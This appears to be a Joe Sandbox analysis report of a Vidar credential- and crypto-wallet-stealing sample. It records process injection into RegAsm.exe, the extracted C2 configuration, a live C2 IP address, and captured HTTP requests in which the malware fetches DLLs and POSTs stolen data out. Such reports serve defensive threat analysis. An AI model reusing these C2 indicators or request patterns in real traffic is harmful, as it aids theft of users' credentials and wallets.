Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1432331
MD5:	5cab81fae61cb23017cc6c6eb6a7e433
SHA1:	e7c299b308a01f140dc54496e20d87583d70a665
SHA256:	4af66ae63601052bcac5f6a91d0d5be8469dedcb7e64cedc99afee7f8b44c7ac
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Vidar

Yara detected Vidar stealer

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5CAB81FAE61CB23017CC6C6EB6A7E433)

conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7328 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7336 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 7344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7264	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7344	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7344	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7344	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.901038.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
4.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.901038.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.8d0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199677575543"]}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 36%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00406F90 CryptUnprotectData,LocalAlloc,LocalFree,	4_2_00406F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00409330 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	4_2_00409330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004117A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	4_2_004117A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00406F10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	4_2_00406F10

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.194.234.100:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.246.168:443 -> 192.168.2.4:49733 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.4.dr, freebl3[1].dll.4.dr
Source:	Binary string: nss3.pdb@ source: nss3[1].dll.4.dr, nss3.dll.4.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.4.dr, softokn3.dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.4.dr, vcruntime140[1].dll.4.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.4.dr, msvcp140.dll.4.dr
Source:	Binary string: nss3.pdb source: nss3[1].dll.4.dr, nss3.dll.4.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.4.dr
Source:	Binary string: mozglue.pdb source: mozglue[1].dll.4.dr, mozglue.dll.4.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.4.dr, softokn3.dll.4.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008E9C1F FindFirstFileExW,	0_2_008E9C1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040B1B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	4_2_0040B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00401200 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	4_2_00401200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040D4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	4_2_0040D4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00416740 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	4_2_00416740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00417800 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	4_2_00417800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00416F50 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	4_2_00416F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_004173C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	4_2_004173C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040A660 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0040AAE0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	4_2_0040AAE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00416BB0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

4_2_00416BB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199677575543

Source: global traffic

HTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 23.194.234.100 23.194.234.100

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBFIJJECFIEBGDGCFIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 7477Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCFBAAAFHJDGCBFIIJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJECGHJDBFIJJJKEHCBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJJDHDGDAAKECAKJDAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDGDAKFHIEHJKFHDHDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJDUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 98729Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBKJECFCFBFIECBKFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168
Source: unknown	TCP traffic detected without corresponding DNS query: 95.217.246.168

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 4_2_00404490 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

4_2_00404490

Source: global traffic	HTTP traffic detected: GET /profiles/76561199677575543 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIJDAAAAAAKECBFBAEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 95.217.246.168Content-Length: 278Connection: Keep-AliveCache-Control: no-cache

Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
